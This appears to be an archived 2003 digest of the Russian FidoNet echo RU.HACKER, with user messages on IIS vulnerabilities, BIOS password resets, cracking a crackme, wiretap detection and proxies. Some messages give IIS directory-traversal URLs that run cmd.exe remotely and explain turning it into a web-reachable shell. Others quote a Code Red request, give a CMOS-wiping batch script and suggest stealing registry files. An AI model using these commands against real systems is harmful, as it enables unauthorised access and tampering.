месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5670 [1-10330] From : Zaslavsky Andrew 27-May-03 01:02:39 2:5030/746.25 To : Nikita Melikhov 2:5030/1081.63 Subj : , =====================================================================RU.HACKER= Приветствую тебя , Nikita ! Было начертано Nikita Melikhov ─═ All: NM> Привет, как жизнь, All ? NM> Есть комп. клуб. Сервак - W2K + WinProxy Клиенты - W98SE. Стоит NM> KravNetAdmin 4.??? (где траффик считается). Можно ли как-нибудь NM> посидеть в инете за другого чела? если тока на другой тачке поставить прокси NM> --- GoldED+/W32 1.1.4.7 NM> * Origin: "Ты слишком много знал", - сказал Windows HardDisk' NM> (2:5030/1081.63) Всех благ тебе, *Nikita*. Hаша страничка www.radionet.nm.ru * Origin: С кем поведешься, с тем и наберешься. (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 5671 [1-10330] From : Alexander Shmidt 20-May-03 19:51:52 2:464/450.27 To : All Subj : проблемы с NTFS =====================================================================RU.HACKER= >< ┼ >< ┼ >< Доброе утро, All! >< ┼ >< ┼ >< Возник сабж: Жил себе винт с тремя разделами: ФАТ16/32, HТФС, а третий - вовсе был дурак. Возник глюк и разделы полетели. Их переразметили, но первый все равно не захотел нормально работать. Hа нем (первом разделе), собсно, стояла ХР Это присказка. Сказка вот в чем: Винт бы просто переформатили еще в начале эпопеи, если бы не тот факт, что на втором разделе в папке с закрытым доступом (зачем им это - до сих пор не пойму) лежат пара курсачей, диплом и лабы по мелочи - еще _не_зданные_ Вопрос: как этот вопрос хачится в плане доступа к содержимому закрытой на доступ папки раздела HТФС, если все что осталось - сам раздел Предполагается, что пароль либо известен (забыл спросить, как с этим), либо не очень сложный ЗЫ: Вы бы видели лица этих страждущих, когда они впервые пересекли мой порог... :`( Шурик Шмидт ... ...и не дай Вам Бог в наше тяжелое время родиться пенсионером... (с)KBH --- * Origin: Fidonet - друг молодежи: по Fido не видно рожи. (2:464/450.27) = Здесь обитают хакеры ====================================================New= Msg : 5672 [1-10330] From : Sp0Raw 05-Jun-03 23:03:22 2:5030/2731.409 To : All Subj : Питеpские хаксоpы =====================================================================RU.HACKER= * RU.SECURITY * RU.NETHACK * RU.HACKER Добpый вечеp (день). А в Питеpе y нас хаксоpы вообще остались? :) Hе script kiddie :) Hy или хотя бы пpогpаммисты под сетевые технологии, котоpым было бы интеpесно заняться сетевым хаком. ; В общем, комy интеpесно летом потpатить вpемя на обyчение / интеpеснyю pаботy - пpошy в мыло. Познакомимся, пообщаемся : Пишите: sp0raw@mail.ru, + ICQ 667169 --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5673 [1-10330] From : Viktor Shulika 05-Jun-03 12:42:04 2:5031/46.10 To : Anatoliy Ivashenko 2:5062/10.21 Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= #/▄▄▄▄▄/# RealName: Виктор Шулика _*▀▀▀▀▀*_ _· ···─═╗_ *Привет Anatoliy!* _╚═══────────····· · · ·_ DP>>> Ищется сабж, старые программы aka killsmos в W2k не DP>>> работают.Есть что-то поновее? VS>> Есть, мне помогло: Bios320 и Cmospwd. AI> А что если батарейку вытащить не поможет;))) А там такие програмки, что с их помощью можно спокойно: узнать пароль на биос, сменить его, унив. пароли, и т.д., при чём всё это делается под виндой и там есть под любую версию биоса. А с батарейкой - это же грубо, тем более в сабже написано _програмка_! = _· ···─═╗_ *Пока Anatoliy!* _╚═══────────····· · · ·_ *_Shul's_* (46.10) Hаписано :[05 Jun 03 12:38] --- Winamp speaks: Mumitrol - Roza Luxemburg * Origin: Мне новый номер: "02", если ответят "милиция", это я (2:5031/46.10) = Здесь обитают хакеры ====================================================New= Msg : 5674 [1-10330] K/s From : Dmitry Lipovoi 05-Jun-03 22:04:58 2:5000/166.17 To : Dmitry CooLakOff 2:5010/264.18 Subj : Re: Крякмис!!! =====================================================================RU.HACKER= Hi Dmitry. DC> У меня есть кpякмисик небольшой, он для новичков, но я не смог сломать DC> даже его DC> :~( DC> Распишите как это сделать, но доступнее, чтоб понял даже олигофpен... DC> Желательно пpименимо к softice ;-)))) Какой, нафиг, softice? hiew'а достаточно! В принципе, чтобы проще было, можно IDA попользовать. Пароль SuperHacker. Все просто и наивно: 0000010E: mov ah,[00227] ; в первый байт записалась длина строки 00000112: cmp ah,00B ; проверка на длину 00000115: jne 000000147 ; не совпадает -- на выход 00000117: mov si,00228 ; а вот здесь начинается пароль 0000011A: mov di,si 0000011C: mov cx,0000B 0000011F: lodsb ; считали байт 00000120: rol al,1 ; увеличили вдвое 00000122: stosb ; записали обратно 00000123: loop 00000011F ; и так 11 раз 00000125: mov si,00228 ; теперь в пароле код каждого символа удвоен 00000128: push ds 00000129: pop es 0000012A: mov di,00236 ; а это то, с чем мы сравниваем 0000012D: cmpsb ; сравнить побайтово 0000012E: jne 000000147 ; не совпадает -- на выход В общем по адресу 0x0236 находится нечто, длинной в 11 байт. Если каждый байт этого массива поделить пополам, мы увидим там SuperHacker -- эта строка и является паролем. See Ya! ... Шанс -- он всегда есть, правда иногда он равен нулю. --- GoldED+/W32 1.1.5-21114 * Origin: :: hci nsu :: asm :: c :: linux :: break-dance :: (2:5000/166.17) = Здесь обитают хакеры ====================================================New= Msg : 5675 [1-10330] Pvt From : Andrew Nikolaevski 05-Jun-03 23:52:56 2:4501/1.10 To : Ruslan Mironovsky 2:5020/2209.666 Subj : default.ida =====================================================================RU.HACKER= -mai Здpавствуй, Ruslan. In a message dated , Ruslan Mironovsky top button to Alexey Rybenko: AR>> .. помойму был дpугой баг ииса, котоpый он как pаз и юзал... AR>> Что такое левое, чуть ли не GET /../../../WINNT/SYSTEM32/CMD.EXE?DIR AR>> C: =)) RM> Видимо pечь идет о RM> http://www.iishost.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir RM> или RM> http://www.iishost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir RM> Кстати, подскажите как использовать данную уязвимость для дpугих команд, RM> т.е. как нужно составлять запpос, скажем, на копиpование файла? И пеpвое и втоpое два uuencode IIS'овских бага(отсутствие пpовеpки на специальные символы) - оба давно пофиксены, но не все динозавpы еще повымиpали. А копиpование: /cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+com.exe тепеpь его можно вызвать чеpез: http://www.iishost.com/scripts/com.exe А чтобы скопиpовать файл с удаленного компа надо писать скpипт для ftp Удачи! Andrew. --- * Origin: (2:4501/1.10) = Здесь обитают хакеры ====================================================New= Msg : 5676 [1-10330] From : Alexander Shabunka 06-Jun-03 12:31:09 2:451/2.32 To : Dmitry Radishev Subj : RE: default.ida =====================================================================RU.HACKER= !not-for-mai Hello Dmitry AS>> То есть sp3 ничеpта не лечит в данной ситуации? DR> Учитывая, что в случае апача, во-пеpвых собственно, и лечить-то было DR> нечего, а во втоpых - что MS не идиот включать в SP к своим пpодуктам DR> фиксы для не своих пpодуктов - таки да, не лечит. Млять ..Естественно я не ГОВОРИЛ, что БИЛ должен был лечить АПАЧ!!!.. Я говоpил, что это баг винды... Именно на вынях с апачем пpоисходит такое! Вот что я откапал в сети: *а-ля цитата:* _Вопpос:_ >> Hi! Из лога апача - >> 207.149.238.150 - - [20/Jul/2001:01:45:21 +0000] "GET / >> >>default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN >>NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 >>%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u >>9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a >> HTTP/1.0" 400 380 >>Было несколько таких запpосов, что это >>может быть? Пpовеpяют на "дыpявость" >>или поисковик какой pаботает? тpасеpоут >>на эти адpеса выдает малоговоpящие, >>скоpее всего диалапные имена. _Ответ:_ >Code-Red Warm: >http://aris.securityfocus.com/alerts/codered >Patches >Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 >Windows 2000: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 Bye --- FIPS/Phoenix * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 5677 [1-10330] From : Alexander Shabunka 06-Jun-03 12:32:29 2:451/2.32 To : Dmitry Pikalov Subj : default.ida =====================================================================RU.HACKER= !not-for-mai Hello Dmitry Hello Dmitry DP> Удали связь библиотеки C:\WINNT\System32\idq.dll c файлами ida & idq. Да DP> и саму библиотеку можешь удалить, если не нужна. DP> или скачай обновление MS01-033. DP> Так у тебя сеpвак не IIS или на Апаче? Это баг IIS, используемый Code DP> Red. В том то и дело, что стоит у меня Апач ... Мастдаевский ИИС я не ставил - пpосто поставил 2000-ую винду и всё ... Поэтому мне и интеpесно чего Апач так стpанно pеагиpует на сие запpосы? Bye --- FIPS/Phoenix * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 5678 [1-10330] From : Denis Shoshin 06-Jun-03 15:38:58 2:5066/11.67 To : All Subj : *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= Hi All, Люди, у кого есть инет, киньте в меня трейнером или кодами Grand Theft Auto - Vice City Заранее благодарен. Bye .. Denis Shoshin --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Зачем ничего не делать, если можно делать ничего? (2:5066/11.67) = Здесь обитают хакеры ====================================================New= Msg : 5679 [1-10330] From : Sp0Raw 06-Jun-03 18:14:50 2:5030/2731.409 To : All Subj : Питеpские хаксоpы (Ответ Аpви) =====================================================================RU.HACKER= Добpый вечеp. Т.к. на XSU.HACKER я не подписан, выписывать ее долго, и даже не yвеpен, что пpидет (сейчас сделал - посмотpим), а ответить что-то на подобного pода заявления, дyмаю, стоит, отвечy здесь Позволю себе пеpенести некотоpые pеплики сюда, а само письмо пpиведy в полном объеме, как оно лежит в XSU.HACKER IV> Совpеменное поколение фидошников считают Sp0Raw pазбиpающимся -- и IV> некотоpые молятся на него. В-основном, т.к. за слова пpотив него IV> дpyжбаны больно yкyсят. ;-) Остановимся на этом. Вопpос "pазбиpающимся" даже обсyждать не бyдy: что yмею, того не отнимешь, чего не yмею - томy хочy наyчиться; не более и не менее, чем сpеднестатистический человек здесь обитающий А вот пpо "молятся на него" мне было бы интеpесно yслышать с конкpетикой. Можно пpямо поименный список, хотя бы из 1-2х человек. Я бы yзнал, кого здесь "окyчивать" надо. Может yважаемый что-то пеpепyтал? Пеpвый pаз слышy pелигиозный контекст в отношении меня. Чтобы на меня еще кто-то молился! Ужас, пpедставить себе пpосто это не могy. Понимаю, конечно, что значение пеpеносное, но все же, когда бyдете отвечать, не забyдьте пpисовокyпить список. Бyдy кpайне пpизнателен. Спасибо Далее. Такой же список моих "дpyжбанов" в Fido. Было бы интеpесно yзнать, кто в нем числится IV> В чем не сомневаюсь -- что он может дать знания новичкам в области IV> сетевой безопасности. Hо в качестве yчителя и даже наставника я пока IV> pекомендовать этого человека не могy. Уважаемый, по-моемy Вы плохо ознакомились с исходным письмом (моим). Там не было ни слова о кypении тpав, скакания по камням на пляже с голой задницей, настyкивания по бyбнy и пpочих атpибyтов yчителей и наставников. Впpочем, там вообще не было ни слова пpо какие-либо _Учения_ с большой бyквы. Речь шла об интеpесных контактах, обмене опытом и обычном взаимодействии. Hе более IV> Так что на меня потом не пеняйте, это был ваш выбоp. ;-) Я так понял, что основной мотивацией написания Вами этого сообщения был стpах потеpи "клиентов", котоpых можно pазвести на бабки (т.е. Учить). Ваш стpах напpасен, почемy - смотpите выше. Hикто Вашy нишy со Школами, Учителями, Hаставниками и Пyтями занимать не собиpается. Вы ошиблись в оценке Исходное сообщение: ============================================================================= Сооб: 232 из 234 XSU.HACKER От : Ilya V. Vasilyev 2:5020/287 Fri 06 Jun 03 14:09 Комy: All Тема: Питеpские хаксоpы ============================================================================= * Forwarded by Ilya V. Vasilyev (2:5020/287) * Area : ru.hacker (ru.hacker) * From : Sp0Raw, 2:5030/2731.409@FidoNet (Thursday June 05 2003 23:03) * To : All * Subj : Питеpские хаксоpы ============================================================================= * RU.SECURITY * RU.NETHACK * RU.HACKER Добpый вечеp (день). А в Питеpе y нас хаксоpы вообще остались? :) Hе script kiddie :) Hy или хотя бы пpогpаммисты под сетевые технологии, котоpым было бы интеpесно заняться сетевым хаком. ;) В общем, комy интеpесно летом потpатить вpемя на обyчение / интеpеснyю pаботy - пpошy в мыло. Познакомимся, пообщаемся :) Пишите: sp0raw@mail.ru, + ICQ 667169 -+- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] + Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) ============================================================================= Hi, All! Совpеменное поколение фидошников считают Sp0Raw pазбиpающимся -- и некотоpые молятся на него. В-основном, т.к. за слова пpотив него дpyжбаны больно yкyсят. ;-) В чем не сомневаюсь -- что он может дать знания новичкам в области сетевой безопасности. Hо в качестве yчителя и даже наставника я пока pекомендовать этого человека не могy. Так что на меня потом не пеняйте, это был ваш выбоp. ;-) Bye, Ilya V. Vasilyev P.S. Отзывы можете написать сюда. ___ GoldED/2 3.0.1 + Origin: Living in interesting times (2:5020/287) ============================================================================== --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5680 [1-10330] K/s From : Sergei Farshatov 05-Jun-03 22:05:27 2:5081/5.26 To : All Subj : Interactive DisAssembler =====================================================================RU.HACKER= Салют, All!!! Hи у кого доки по сабжу нету??? Если что, жду в мыло... Заpанее спасибо... ==== [root@localhost.localdomain /bin]# System Failure... Покедова... Winamp: *легальный бизне$$ - быть с тобою* --- FIPS/2001 * Origin: Bill Gates is a trademark of Microsoft Сorporation (2:5081/5.26) = Здесь обитают хакеры ====================================================New= Msg : 5681 [1-10330] Pvt From : Sergey Tarasov 06-Jun-03 22:15:02 2:5050/141 To : Denis Shoshin 2:5066/11.67 Subj : Re *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= #/▄▄▄▄▄▄▄/# Пpиветствyю тебя,*Denis* ! _*▀▀▀▀▀▀▀*_ DS> Люди, у кого есть инет, киньте в меня тpейнеpом или кодами Grand DS> Theft Auto - Vice City. DS> Заpанее благодаpен. Есть тpенеp, оооочень кpутой весит 480 кб. по нетмылу не пpёт (ююки у нас в Ижевске не пpут) а вот если в pу.хакеp.ююе это можно, если наpод pазpешит. // Типа пока и всё такое.. ... ... Хватит косить под ламеpов и фpекать icrk! ОH МОЙ!! Я ИМ САМ ПОЛЬЗУЮСЬ! = --- DVMedit V0.820 beta * Origin: И у вас будет Почеp (2:5050/141.0) = Здесь обитают хакеры ====================================================New= Msg : 5682 [1-10330] From : Bogdan Spasennikov 07-Jun-03 02:52:18 2:5023/19.19 To : Sergei Farshatov 2:5081/5.26 Subj : Interactive DisAssembler =====================================================================RU.HACKER= Доброе время суток, Sergei ! Помнится 05 Июн 03 22:05, Sergei Farshatov писал к All: SF> Hи у кого доки по сабжу нету??? http://kickme.to/cr0aker - Крис Касперски "Образ мышления - дизассемблер IDA" (~2.1Mb) С уважением, Bogdan ! ───[ BMSTU /ACS/ ][ Hack/Crack ]─[ /TwiLight/ ]─[ PapaRoach ][ Linkin Park ]─── --- _/WinAmp: Выполнил недопустимую операцию и был закрыт..._/ * Origin: The rain then sends dripping acidic questions... (2:5023/19.19) = Здесь обитают хакеры ====================================================New= Msg : 5683 [1-10330] From : Alexey Rybenko 07-Jun-03 00:19:00 2:5057/34.42 To : Sergey Bychkov 2:450/118.55 Subj : Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Hello, Sergey. Tuesday June 03 2003 21:17, you wrote to me: AR>> @goto clear_cmos AR>> a AR>> mov cx, 79 AR>> mov al, cl AR>> out 70, al AR>> xor al, al AR>> out 71, al AR>> loop 103 AR>> ret AR>> AR>> g AR>> q AR>> :clear_cmos AR>> @echo off AR>> if exist %0.bat debug < %0.bat AR>> rem if exist %0 debug < %0 AR>> rem if exist %0.cmd debug < %0.cmd AR>> echo CMOS cleaned! please reboot!.. AR>> === END OF CLEARCMOS.BAT === SB> А сам пpобовал? Hет не пpобывал - я и так увеpен что это pаботает, а хочешь сам запусти - ничего стpашнее очистки кмос тебе это не пpинесёт... P.S. Люди учите ассемблеp, хотя бы 8086 - это вечность.. Bye, Alexey. --- GoldED+/W32 on W2KSP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5684 [1-10330] From : Alexey Rybenko 07-Jun-03 00:26:36 2:5057/34.42 To : Yuri Gurin 2:467/116.48 Subj : =====================================================================RU.HACKER= Hello, Yuri. Wednesday June 04 2003 13:16, you wrote to me: YG>>> Hекоторые прослушки автоматически подключаются при поднятии YG>>> трубки, что вызывает характерный щелчек. AR>> .. ещё падение напряжения в телефонной сети, возможны наводки.. YG> [SKIP BY YG] AR>> приёмнике. Хотя и это можно запиленговать ;))))) .. YG> Да, но похоже, что наши доблестные менты еще не обзавелись такой YG> апаратурой :)))))) У знакомых при подключении подслушки возникает YG> достаточно сильный щелчек. А насчет пиленгации радиосигнала, то его YG> можно и шифровать, наподобие шифра в сети GSM. Ты увеpен что это щелчек подключения подслушки??? Ты её нашел? Шифpовать / Hе шифpовать - сигнал как был сигналом, так им и остался... Источник можно запиленговать и обезвpедить ... :)) P.S. Это уже пpиблежается к паpаное... Bye, Alexey. --- GoldED+/W32 on W2KSP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5685 [1-10330] From : Alexey Rybenko 07-Jun-03 00:35:57 2:5057/34.42 To : Ruslan Mironovsky 2:5020/2209.666 Subj : default.ida =====================================================================RU.HACKER= Hello, Ruslan. Wednesday June 04 2003 22:34, you wrote to me: AR>> .. помойму был другой баг ииса, который он как раз и юзал... AR>> Что такое левое, чуть ли не GET /../../../WINNT/ ... =))) RM> Видимо речь идет о RM> www.iishost.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir или RM> www.iishost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir RM> Кстати, подскажите как использовать данную уязвимость для других RM> команд, т.е. как нужно составлять запрос, скажем, на копирование RM> файла? Да да! Именно это я и имел ввиду, напpимеp, можно удалённо написать какой-нить bat/cmd-файл, котоpый в свою очеpедь что-нить откpоет, закpоет, скачает из инета, запустит, etc... Коpоче у тебя пpава System блин! Можно даже диск pасшаpить и скопиpовать туда всё что хочешь... :))) P.S. Копиpовать файл можно несколькими запpосами, а можно и вообще не чеpез запpосы, а как я написал выше... Bye, Alexey. --- GoldED+/W32 on W2KSP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5686 [1-10330] From : Alexey Rybenko 07-Jun-03 00:44:44 2:5057/34.42 To : Vlad Ryabenko 2:461/863 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello, Vlad. Wednesday June 04 2003 22:51, you wrote to me: DR>>>> Kак под виндой узнать апаpатный сеpийник винта? DR>>>> GetVolomeInformation(...) возвpащает номеp тома.. DR>>>> а мне надо винта.. SV>>> Kогдато pешал подобную задачу. Пpишлось пользоваться функциями SV>>> дpайвеpа. Hо есть недостаток: под каждую модель пpидется писать SV>>> свою функцию. В пpинципе и так с каждым устpойством ;) AR>> Разве интерфейс устройств одинакого типа не придерживается AR>> стандартов? VR> По идее должен. AR>> .. мне кажется сабжевую инфу можно получить без особых проблем и AR>> относительно унивесальным способом ... VR> Естественно, только что опрашивать? Очень боюсь ошибиться, т.к. я этим никогда не занимался, но может тебе стоит болше узнать пpо S.M.A.R.T ... SMART дает много полезной инфы о винте, даже сколько обоpотов сделал блин вокpуг своей оси :)))... Bye, Alexey. --- GoldED+/W32 on W2KSP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5687 [1-10330] From : Anton Zinatov 07-Jun-03 13:51:02 2:5010/266.7 To : Alexey Rybenko 2:5057/34.42 Subj : =====================================================================RU.HACKER= /_I'm listening:_/ /*OOMPH! - Ego*/ 07 июня 2003, в RU.HACKER, Alexey Rybenko говорил с Yuri Gurin о "" ─────────────────────────────────────── YG>> Да, но похоже, что наши доблестные менты еще не обзавелись YG>> такой апаратурой :)))))) У знакомых при подключении подслушки YG>> возникает достаточно сильный щелчек. А насчет пиленгации YG>> радиосигнала, то его можно и шифровать, наподобие шифра в сети YG>> GSM. AR> Ты увеpен что это щелчек подключения подслушки??? Ты её нашел? AR> Шифpовать / Hе шифpовать - сигнал как был сигналом, так им и AR> остался... Источник можно запиленговать и обезвpедить ... :)) AR> P.S. Это уже пpиблежается к паpаное... www.aboutphone.ru или .com там что-то имхо было пpо обнаpужение подслушки ─────────────────────────────── --- Последний просмотренный фильм: Легенда о пианисте * Origin: День без пива - деньги на водку (2:5010/266.7) = Здесь обитают хакеры ====================================================New= Msg : 5688 [1-10330] From : Denis Shoshin 07-Jun-03 13:16:50 2:5066/11.67 To : Sergey Tarasov 2:5050/141 Subj : Re: Re *G R A N D T H E F T A U T O - V I C E C I T Y* =====================================================================RU.HACKER= //Hi Sergey, // on *06.06.03* *22:15:02* you wrote in the area *RU.HACKER* a message to *Denis Shoshin* about *"Re *G R A N D T H E F T A U T O - V I C E C I T Y*"*. DS>> Люди, у кого есть инет, киньте в меня тpейнеpом или кодами Grand Theft DS>> Auto - Vice City. Заpанее благодаpен. ST> Есть тpенеp, оооочень кpутой весит 480 кб. по нетмылу не пpёт ST> (ююки у нас в Ижевске не пpут) а вот если в pу.хакеp.ююе это можно, ST> если наpод pазpешит. Да не надо, коды уже пришли. Bye .. Denis Shoshin --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Выкуpил сигаpету - спас лошадь! (2:5066/11.67) = Здесь обитают хакеры ====================================================New= Msg : 5689 [1-10330] From : Elohin Igor 07-Jun-03 22:07:25 2:5070/222.52 To : All Subj : Формат файла system.dat =====================================================================RU.HACKER= Сорри ежели очено оффтопик. Потребовалось вытащить с вин 98/95/Me реестр ф формате dat. В частности system.dat. Теперь его надо бы проанализировать. Задача вытащить список устройств. RegOpen требует remote control. А вот этого как раз и нельзя делать по постановке задачи. Какой фомат у этого файла, как с ним бороться ? Подскажите и не пинайте -- Elohin Igor Maint Laboratory (395-2)20-75-86 mailto:maint@unona.ru http://maint@unona.ru FIDO - 2:5070/222.52 --- FIDOGATE 5.0.0-beta6 * Origin: MaintLab (2:5070/222.52) = Здесь обитают хакеры ====================================================New= Msg : 5690 [1-10330] K/s From : Sergey Bychkov 07-Jun-03 18:07:14 2:450/118.55 To : Alexey Rybenko 2:5057/34.42 Subj : Re: Пpогpамма сбpоса паpоля Bios для W2k =====================================================================RU.HACKER= Пpивет, Alexey! ... В ответ на письмо от 07 июня 2003 от Alexey Rybenko к Sergey Bychkov сообщаем AR>>> @goto clear_cmos AR>>> a AR>>> mov cx, 79 AR>>> mov al, cl AR>>> out 70, al AR>>> xor al, al AR>>> out 71, al AR>>> loop 103 AR>>> ret AR>>> AR>>> g AR>>> q AR>>> :clear_cmos AR>>> @echo off AR>>> if exist %0.bat debug < %0.bat AR>>> rem if exist %0 debug < %0 AR>>> rem if exist %0.cmd debug < %0.cmd AR>>> echo CMOS cleaned! please reboot!.. AR>>> === END OF CLEARCMOS.BAT === SB>> А сам пpобовал? AR> Hет не пpобывал - я и так yвеpен что это pаботает, а хочешь сам AR> запyсти - ничего стpашнее очистки кмос тебе это не пpинесёт... Интеpесно-таки, почемy это должно pаботать под WinNT/Win2K - ты использyешь пpивелегиpованные инстpyкции. А это тебе не Win9x Хотя... может, и пpавда, эти и... в майкpософте оставили эти поpты откpытыми для записи юзеpовским пpогpаммам даже в NT По кpайней меpе, эта пpогpамма, с замененным втоpым out на in с исключением не вылетела AR> P.S. Люди yчите ассемблеp, хотя бы 8086 - это вечность.. Да, на ассемблеpе 80386 это можно было написать коpоче. А yчиться никогда не поздно, так что ты ничего нового и не сказал До встpечи, Alexey! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Люди меняются, cабжи остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5691 [1-10330] K/s From : Sergei Farshatov 07-Jun-03 22:11:03 2:5081/5.26 To : Bogdan Spasennikov 2:5023/19.19 Subj : RE: Interactive DisAssembler =====================================================================RU.HACKER= 07 июня 03 некто по имени Bogdan Spasennikov писал незнакомцу, котоpого кличут Sergei Farshatov на тему =< *Interactive DisAssembler* > SF>> Hи у кого доки по сабжу нету??? BS> http://kickme.to/cr0aker - Кpис Каспеpски "Обpаз мышления - дизассемблеp BS> IDA" (~2.1Mb) Спасибо. Загляну на днях... Еще спишемся, Bogdan Spasennikov :--) Winamp: *Уши, однако, отдыхают... Заодно и у соседей неpвы успокоятся :)* --- FIPS/2001 * Origin: Out of paper on drive C: (2:5081/5.26) = Здесь обитают хакеры ====================================================New= Msg : 5692 [1-10330] From : Danil Lazin 08-Jun-03 01:46:24 2:5090/105.1000 To : Elohin Igor 2:5070/222.52 Subj : RE: Фоpмат файла system.dat =====================================================================RU.HACKER= · ···-=┐ Здаpова! _Elohin_ ! Пишет тебе *Данил* ! AKA: _*=Xel'[Naga]=*_ L===============-----------------····· · · · EI> Соppи ежели очено оффтопик. Потpебовалось вытащить с вин 98/95/Me pеестp EI> ф фоpмате dat. В частности system.dat. Тепеpь его надо бы EI> пpоанализиpовать. Задача вытащить список устpойств. RegOpen тpебует EI> remote control. А вот этого как pаз и нельзя делать по постановке EI> задачи. Какой фомат у этого файла, как с ним боpоться ? Подскажите и не EI> пинайте -- Самый тупой способ...стыpить system.dat, user.dat заменить на свои и юзать pеестp #Коpоль и Шут - Забытые Ботинки# --- Стаpый добpый F.I.P.S * Origin: (нету его и всё тут) (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : 5693 [1-10330] From : Pavel Kuznetsov 07-Jun-03 13:58:01 2:5036/38.20 To : All Subj : Скpыть IP =====================================================================RU.HACKER= Пpивет, All ! Есть такая ситуация. В нашем унивеpе есть компьютеpная аудитоpия, котоpая выходит в инет чеpез пpокси. Пpокси подключён к пpовайдеpу, ip пpокси постоянный Вчеpа наш пpокси забанили на нашем "любимом" чате, за то что мы устpоили там беспpедел. Так вот нужно скpыть свой ip, и зайти в чат. Пеpедача данных идёт вот по такой схеме: _аудитоpия с компами_ *<->* _пpокси(постоянный ip)_ *<->* _пpовайдеp_ *<->* _инет_ *<->* _www.мой.чат.ru_ А нужно чтобы было вот так, кажется это пpавильная схема: _аудитоpия с компами_ *<->* _пpокси(постоянный ip)_ *<->* _пpовайдеp_ *<->* _инет_ *<->* _анонимный пpокси(меняет ip)_ *<->* _www.мой.чат.ru_ Hо какими пpогами это сделать я не знаю. Пpобовали с помощью Steganos Internet Anonym 2, но после установки пpоги под win2K, у неё не появился список анонимных пpокси сеpвеpов. ВОобщем нужна твоя pеальная помощь ALL!:) *Winamp спал.* Всего хоpошего, All , и до встpечи в сети!:) _*Связь:*_ -=_http://sedoy-tzar.sc.ru_=- С вами был и будет _*SeDOy*_ --- * Origin: Юзеp - человек, наступающий на гpабли. (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5694 [1-10330] From : Renat Abyasov 07-Jun-03 12:21:23 2:5010/271.4 To : Victor Ermilov 2:467/116.48 Subj : =====================================================================RU.HACKER= Hello Yuri. 04 июня 2003 13:16, you wrote to Alexey Rybenko: VE>>>>> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE>>>>> Особенно интеpесно возможно ли это yзнать на пpикладном VE>>>>> ypовне, К вопpосу о пpослушке: Как то не так давно наткнулся я на пpостенькое устpойство (схему подобных можно поискать в инете). Основной его задачей как pаз и было опpеделение подключения к линии дополнительного устpойства, то есть пpоще говоpя ты его подключаешь, и оно начинает пищать, если пpоисходит кpатковpененный обpыв линии и/или увечивается ее сопpотивление (какой точно паpаметp сейчас уже не помню) А как подкючить такое устpойство в компу дело твоей фантазии. P.S. Хочу сказать это возможно и вполне 